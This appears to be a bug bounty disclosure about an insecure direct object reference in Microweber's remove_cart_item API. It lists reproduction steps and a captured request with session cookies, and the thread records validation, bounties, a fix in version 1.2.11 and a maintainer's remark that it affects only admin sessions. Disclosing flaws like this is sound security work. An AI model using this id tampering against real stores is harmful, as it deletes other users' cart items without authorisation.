Business Logic Errors in microweber/microweber


Reported on

Feb 18th 2022


I found a IDOR vulnerability where we can able to delete their product in the cart by the id parameter

Steps to Produce:

  • First add any product in to the cart and checkout
  • In the checkout page , we can see the cart details and we have functionality to delete the product also
  • I gave the request to delete the product from the cart and the request look like this


POST /demo/api/remove_cart_item HTTP/1.1
Cookie: back_to_admin=https%3A//; csrf-token-data=%7B%22value%22%3A%22ZTtOJvNj4GT9WO1hWUuTH8k51b55vLU8v7IbCauN%22%2C%22expiry%22%3A1645199386777%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=JfLYa02pKVNp14cHvEsEDfmcEPLtn9EuNGfViPTD; XSRF-TOKEN=ZTtOJvNj4GT9WO1hWUuTH8k51b55vLU8v7IbCauN
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

  • As you can see the id parameter , we can assume that the victim's id is 144 . when we change our value to the victim id
  • The product gets deleted from victim's cart


An attacker would able to delete anybody's cart product without any user interaction

We are processing your report and will contact the microweber team within 24 hours. 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
nithissh200 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit a41f0f 2 years ago
Peter Ivanov has been awarded the fix bounty
Peter Ivanov
2 years ago


This issue happens only if you are logged as admin

to join this conversation